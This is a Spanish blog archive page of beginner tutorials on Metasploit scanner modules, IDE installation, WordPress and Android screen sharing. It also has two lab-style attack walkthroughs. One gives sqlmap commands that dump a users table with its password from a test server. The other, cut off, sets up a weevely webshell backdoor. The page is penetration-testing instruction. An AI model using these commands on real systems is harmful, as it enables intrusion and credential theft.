Entradas

Mostrando las entradas de diciembre, 2018

03.- Crear nuestro primer exploit en metasploit

Imagen
En este tutorial vamos a crear nuestro propio exploit con el cual vamos a verificar que tipo de servicio ftp cuenta alguna maquina remota.
Vamos a abrir el path  /usr/share/metasploit-framework/modules/auxiliary/scanner/ftp


Donde vamos a crear un documento llamado ftp_access.rb

Lo abrimos y colocamos este codigo


### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework### Llamamos las funciones de metaesploit#require 'msf/core'#Iniciamos nuestra claseclassMetasploitModule<Msf::Auxiliary##Llamamos las funciones de ftp y de escanerincludeMsf::Exploit::Remote::FtpincludeMsf::Auxiliary::Scanner# Inicializamos nuestro exploitdefinitialize# Colocamos datos que describan nuestro exploitsuper('Name'=>'FTP Access','Description'=>'Detectamos que version de ftp tiene la maquina remota.','Author'=>'Eugenio','License'=>MSF_LICENSE)# Damos de alta…

02.- Mi primer exploit en Kali Linux con Metasploit

Imagen
El modulo a estudiar es http_version.rb y se encuentra ubicado en:
/usr/share/metasploit-framework/modules/auxiliary/scanner/http/http_version.rb
Este exploit no dice algunas caracteristicas de la victima como:
Sistema Operativo: Windows, Ubuntu, Debian, Centos
Servidor web: Nginx, Apache, IIS
Protocolo: http o https

Para usar ese modulo debemos escribir en la terminal:
msfconsole use auxiliary/scanner/http/http_version Para ver las opciones debemos poner show options A lo que no regresa algo asi

Para dar de alta una pagina a explorar ponemos
set RHOSTS islalocal.com Despues
exploit A lo que nos regresara esto:

Para cambiar el perto de http a https debemos escribir esto:
set RPORT 443 Y hacemos el mimos proceso anterior
set RHOSTS islalocal.com exploit















01.- Que es metasploit ?

Imagen
¿Que es Metasploit? Metasploit es una herramienta (o conjuto de herramientas) que se puede utilizar para probar la vulnerabilidad de los sistemas informáticos o entrar en sistemas remotos. Al igual que muchas herramientas de seguridad informática, Metasploit se puede utilizar tanto para actividades legítimas y autorizadas como para actividades ilícitas.

Historia de Metasploit: Metasploit fue creado por H.D Moore en el 2003, usando el lenguaje Perl. El 21 de octubre de 2009,  Metasploit fue adquirido por Rapid7, una empresa de seguridad.


¿Porque usar Metasploit? 1.- Facil de usar: Una vez instalado el nucleo metaesploit el siguiente paso es ejecutar los programas ademas de estar perfectamente documentados.
2.- Escalable: Ademas de usar los scripts de metaesploit podemos crear nuestros propios scripts.
3.- Opensource: Metasploit esta creado con Ruby lo cual nos permite modificar el nucleo y adaptarlo a nuestras necesidades.
4.- Comunidad: Existen muchos usuarios de metaexploit que cons…

Instalar Netbeans 10 en Windows 10

Imagen
Requerimientos tener URL de Java JDK 9 

Descargamos Netbeans desde esta URL

Lo descomprimimos


Abrimos el archivo "incubating-netbeans-10.0-bin\netbeans\etc\netbeans.conf" y buscamos el texto "netbeans_jdkhome" quitamos el # y ponemos el path de nuestro java 10


Nos movemos al path "incubating-netbeans-10.0-bin\netbeans\bin" y hacemos click en netbeans64.exe o netbeans.exe (dependiendo de nuestr SO)


Y listo


Instalar netbeans 10 en ubuntu 18.04

Imagen
(Opcional) Actualizar repositorios
sudo apt update
Agregar el PPA de java a nuestro repositorio
sudo add-apt-repository ppa:webupd8team/java
Nuevamente actualizar repositorios e instalamos java jdk
sudo apt update sudo apt install default-jre default-jdkRevisamos que java este correctamente instalado
javac -version
Debe salir algo asi
javac 10.0.2
Y listo ahora procedemos a instalar Netbeans
Descargamos netbeans desde este link

Descomprimimos el archivo descargado


Entramos a la carpeta extraída hasta "incubating-netbeans-10.0-bin/netbeans/etc/" una vez ahi abrimos el archivo netbeans.conf


Abrimos el archivo "incubating-netbeans-10.0-bin/netbeans/etc/netbeans.conf" y buscamos el texto "netbeans_jdkhome"
quitamos el # y ponemos el path de nuestro java 10 en mi caso "/usr/lib/jvm/java-1.11.0-openjdk-amd64"


Abrimos la terminal y nos movemos al path "incubating-netbeans-10.0-bin/netbeans/bin" y escribimos el siguiente comando
sh netbeans

Damos c…

Subir articulos de prueba a Wordpress

Imagen
En ocasiones cuando hacemos una nueva instalación de WordPress desde cero y todavía no hay ningún articulo para la web, por cualquier razon, una de las tareas más tediosas es crear contenido demo, dummy o de prueba para verificar cómo se va a ver cada una de las páginas. Para resolver este problema podemos usar el area de importacion de wordpress la cual presento en el siguiente manual:

1.- Descargamos este archivo en cualquier parte de mi la maquina local en mi caso "/home/eugenio/Descargas/theme-unit-test-data.xml"

2.- Vamos al wp-admin->Herramientas->Importar->Ejecutar importador


3.- Click en Seleccionar archivo, ubucamos el archivo que descargamos en el paso 1 y despues click en Subir archivo e importar.

4.- Click en Submit



5.- Nos debe arrojar un resultado asi

6.- Ahora podemos ir al area de entradas y ver todos los articulos que se han creado



Backdoor Webshell con weevely en Kali Linux

Imagen
En este manual vamos a analizar la forma en la que usuarios malintencionados pueden llegar a tomar control de nuestros sistemas web (paginas web). Para evitar que lleguen a colocarnos archivos archivos maliciosos en nuestro sistema debemos de sanitisar nuestro código con las medidas de seguridad que el mismo php recomienda
Recordemos que para hacer nuestras pruebas debemos tener un sistema de pruebas con vulnerabilidades lo cual lo podemos instalar siguiendo este manual.
En los siguientes sencillos 3 pasos podemos iniciar nuestra pruebas con weevely:
1.- Instalamos PySocks la cual nos ayudara a iniciar la conexión entre nustra maquina y la pagina victima. git clone https://github.com/Anorov/PySocks.git cd PySocks python setup.py install Nos salimos de la carpeta cd .. 2.- Ahora usaremos weevely que creara un archivo tunel entre nuestro kali y la pagina victima Descargamos y entramos a weevely git clone https://github.com/epinna/weevely3.git cd weevely3 Creamos un archivo tunel llamado w…

Sqlmap en Kali Linux

Imagen
1.- Vamos a obtener la bd
sqlmap -u http://192.168.8.103/cat.php?id=2 --dbs Esto nos debe de regresar algo asi


2.- Ahora vamos a sacar las tablas de la bd photoblog que obtuvimos previamente
sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog --tables Este es el resultado


3.- Una vez obtenidas las columnas vamos a sacar las columnas de tabla users asi:
sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users --columns Este es el resultado:



4.- Una vez obtenidas las columnas vamos a sacar los registros de las columnas:
sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users -C id,login,password --dump Listo hemos obtenido el usuario y password.
User: admin
Password: P4ssw0rd






Kali linux colocar dock (menu) en la parte inferior

Imagen
Presionamos tecla windows y escribimos retoques y damos click en el icono



Seleccionamos el engrane de "Dash to dock"


En la pestaña "Posicion y tamaño" Seleccionamos inferior


























Compartir pantalla de android en Ubuntu 18.04 con Screen Stream over HTTP

Imagen
1.- En google play buscamos "Screen Stream over HTTP" y click en instalar


2.- Abrimos la aplicación.



3.- Click en el icono de start stream.


4.- Click en Comenzar ahora.

6.- Abrimos la url http://192.168.8.101:8080 (la que muestra en telefono)



7.- Ahora podemos ver nuestro android en el navegador












Compartir pantalla de android en Ubuntu 18.04 con screen mirror

Imagen
1.- En google play buscamos "screen mirror smart dato vgmbh"
2.- Instalamos la aplicación.

3.- Abrimos la aplicación.

4.- Click en el icono de streaming.

5.- Damos click en permitir.

6.- Abrimos esta url http://screenmirrorapp.com y con el telefono escaneamos el codigo QR

7.- Click en comenzar ahora.

8.- Ahora podemos ver nuestro android en el navegador






Facebook Like